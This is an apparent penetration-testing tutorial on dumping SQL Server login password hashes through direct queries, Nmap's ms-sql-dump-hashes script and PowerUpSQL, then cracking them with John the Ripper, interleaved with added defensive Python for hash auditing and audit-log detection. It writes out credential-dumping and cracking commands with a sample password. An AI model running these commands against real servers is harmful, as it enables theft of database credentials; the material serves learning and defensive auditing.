In this article, we will learn about multiple ways to get the password hashes of MSSQL users. Different versions of MSSQL use different hash formats; we performed our practical on SQL Server 2016. Once we have the hashes, we will use JohnTheRipper to crack them.
Table of Content
· Introduction to Hashing in SQL Server
· CLI
· Nmap
· PowerUpSQL
· JohnTheRipper
Introduction to Hashing in SQL Server
A hash produced by SQL Server looks somewhat like the following:
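The page's screenshot of the hash is not reproduced here, so the following added example (not code from the original article) shows what a SQL Server 2012+ login hash is made of. For SQL Server 2012 and later, including the 2016 build used in this article, the value in sys.sql_logins.password_hash is the two-byte version tag 0x0200, a 4-byte random salt, and SHA-512 over the UTF-16LE password followed by the salt (this is the layout John refers to as mssql12; SQL Server 2005 through 2008 R2 used the 0x0100 tag with SHA-1 instead). The sample logins, the salt, the banned-password list and the function names are constructed for the example; the audit helper is written from a defender's side, to check your own instance's logins against a list of passwords your policy forbids.

```python
import hashlib
import hmac
import os
from typing import Optional

# Layout of a SQL Server 2012+ password hash as stored in sys.sql_logins.password_hash:
#   0x0200 | 4-byte random salt | SHA-512( UTF-16LE(password) || salt )
# (SQL Server 2005-2008 R2 used 0x0100 | salt | SHA-1 instead; not handled here.)
VERSION_TAG = b"\x02\x00"
SALT_LEN = 4
DIGEST_LEN = 64


def mssql_hash(password: str, salt: Optional[bytes] = None) -> str:
    """Build a hash in the '0x0200...' form SQL Server 2012+ stores for a login."""
    if salt is None:
        salt = os.urandom(SALT_LEN)  # SQL Server picks a fresh random salt per password
    if len(salt) != SALT_LEN:
        raise ValueError("salt must be exactly 4 bytes")
    digest = hashlib.sha512(password.encode("utf-16-le") + salt).digest()
    return "0x" + (VERSION_TAG + salt + digest).hex().upper()


def parse_hash(stored: str):
    """Split a stored hash into (salt, digest); rejects anything that is not 0x0200 format."""
    hexpart = stored[2:] if stored.lower().startswith("0x") else stored
    raw = bytes.fromhex(hexpart)
    if len(raw) != len(VERSION_TAG) + SALT_LEN + DIGEST_LEN or raw[:2] != VERSION_TAG:
        raise ValueError("not a SQL Server 2012+ (0x0200) password hash")
    return raw[2:2 + SALT_LEN], raw[2 + SALT_LEN:]


def password_matches(stored: str, candidate: str) -> bool:
    """True if 'candidate' is the password behind 'stored' (same recipe SQL Server uses)."""
    salt, digest = parse_hash(stored)
    expected = hashlib.sha512(candidate.encode("utf-16-le") + salt).digest()
    return hmac.compare_digest(expected, digest)


def audit_logins(logins, banned_passwords):
    """Return {login_name: banned_password} for every login still using a forbidden password.

    'logins' is a list of (name, password_hash) pairs as read from sys.sql_logins.
    """
    findings = {}
    for name, stored in logins:
        for pw in banned_passwords:
            if password_matches(stored, pw):
                findings[name] = pw
                break
    return findings


# Constructed sample data: a fixed salt and two logins, one of which still
# uses the weak password from the article. Nothing here comes from a real server.
SAMPLE_SALT = bytes.fromhex("A1B2C3D4")
SAMPLE_LOGINS = [
    ("sa", mssql_hash("Password@1", SAMPLE_SALT)),
    ("reportsvc", mssql_hash("k9!Vx#2pL8qZ@wRm", SAMPLE_SALT)),
]
BANNED_PASSWORDS = ["Password@1", "Password1", "sa", "admin"]

if __name__ == "__main__":
    for name, h in SAMPLE_LOGINS:
        print(f"{name}: {h}")
    print("logins using a banned password:", audit_logins(SAMPLE_LOGINS, BANNED_PASSWORDS))
```

On a live instance you would feed audit_logins the rows from the sys.sql_logins query shown in the next section; reading the password_hash column requires CONTROL SERVER permission, so the audit should be run by an administrator, and any login it flags should have its password changed and CHECK_POLICY enabled.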
CLI
To get hashes of all the users, use the following query:
SELECT * FROM sys.sql_logins
To get the hash of a particular user, use the following query:
select name,password_hash from sys.sql_logins where name='sa'
As you can see, both of the above queries have given us the desired result.
Nmap
We can also retrieve the hashes remotely using Nmap. The command to do so is the following:
nmap -p1433 --script ms-sql-dump-hashes --script-args mssql.username=sa,mssql.password=Password@1 192.168.1.146
And as the result of the above command, we have our hash.
PowerUpSQL
To get the hashes remotely, PowerUpSQL provides a simple command, which is as follows:
Import-Module .\PowerUpSQL.ps1
Get-SQLServerPasswordHash -username sa -Password Password@1 -instance WIN-P83OS778EQK\SQLEXPRESS -Verbose
These are the multiple ways to retrieve the hashes for the MSSQL server, both remotely and locally.
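Whichever client is used, every method above ends up reading sys.sql_logins (or its password_hash column) on the server, and only a principal with CONTROL SERVER can see that column, so a hash dump is visible from the server side. The following added detection example (not part of the original article) runs over constructed rows shaped like the output of sys.fn_get_audit_file() from a SQL Server Audit capturing statements, and flags every principal whose statements touch the hash store; the row values, principal names and the function name are made up for the example.

```python
import re
from collections import defaultdict

# Constructed sample rows in the column layout returned by sys.fn_get_audit_file()
# (event_time, action_id, server_principal_name, statement, succeeded).
# Values are invented for the example; action_id "SL" is SELECT.
SAMPLE_AUDIT_ROWS = [
    {"event_time": "2024-05-01 09:12:03", "action_id": "SL", "server_principal_name": "reportsvc",
     "statement": "SELECT TOP 10 * FROM Sales.Orders", "succeeded": True},
    {"event_time": "2024-05-01 09:14:41", "action_id": "SL", "server_principal_name": "sa",
     "statement": "SELECT name, password_hash FROM master.sys.sql_logins", "succeeded": True},
    {"event_time": "2024-05-01 09:15:02", "action_id": "SL", "server_principal_name": "sa",
     "statement": "select *\n  from   sys.sql_logins", "succeeded": True},
    {"event_time": "2024-05-01 09:20:17", "action_id": "SL", "server_principal_name": "appuser",
     "statement": "SELECT LOGINPROPERTY('sa', 'PasswordHash')", "succeeded": False},
    {"event_time": "2024-05-01 09:21:00", "action_id": "SL", "server_principal_name": "appuser",
     "statement": "SELECT name FROM sys.server_principals", "succeeded": True},
]

# Statements that expose login hashes: the sys.sql_logins view, its password_hash
# column, or LOGINPROPERTY(..., 'PasswordHash'). Case-insensitive; whitespace
# inside the statement is collapsed before matching so line breaks cannot hide a hit.
HASH_READ = re.compile(
    r"\bsys\.sql_logins\b|\bpassword_hash\b|\bloginproperty\s*\([^)]*passwordhash",
    re.IGNORECASE,
)


def normalize(statement: str) -> str:
    """Collapse runs of whitespace so multi-line statements match the same as one-liners."""
    return " ".join(statement.split())


def find_hash_reads(rows):
    """Group hash-store reads by server principal.

    Returns {principal: [(event_time, normalized_statement, succeeded), ...]}.
    Failed attempts are kept too: a denied read of password_hash from a non-admin
    login is at least as interesting as a successful one.
    """
    hits = defaultdict(list)
    for row in rows:
        stmt = normalize(row["statement"])
        if HASH_READ.search(stmt):
            hits[row["server_principal_name"]].append((row["event_time"], stmt, row["succeeded"]))
    return dict(hits)


if __name__ == "__main__":
    for principal, events in find_hash_reads(SAMPLE_AUDIT_ROWS).items():
        for when, stmt, ok in events:
            print(f"{when}  {principal:<10} {'ok' if ok else 'DENIED':<6} {stmt}")
```

In practice the rows would come from a server audit with the SCHEMA_OBJECT_ACCESS_GROUP action group enabled (or from Extended Events capturing sql_batch_completed), and the "sa" hits above are exactly what the CLI, Nmap and PowerUpSQL methods on this page would leave behind.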
JohnTheRipper
Now that we have acquired the hashes, all we have to do is crack them. For this, we will use the almighty password cracker, JohnTheRipper. To crack the password hash, use the following command:
john --format=mssql12 --wordlist=pass hash
The result shows us that the password is Password@1, which is accurate. So, this way, one can dump and then crack the MSSQL hashes.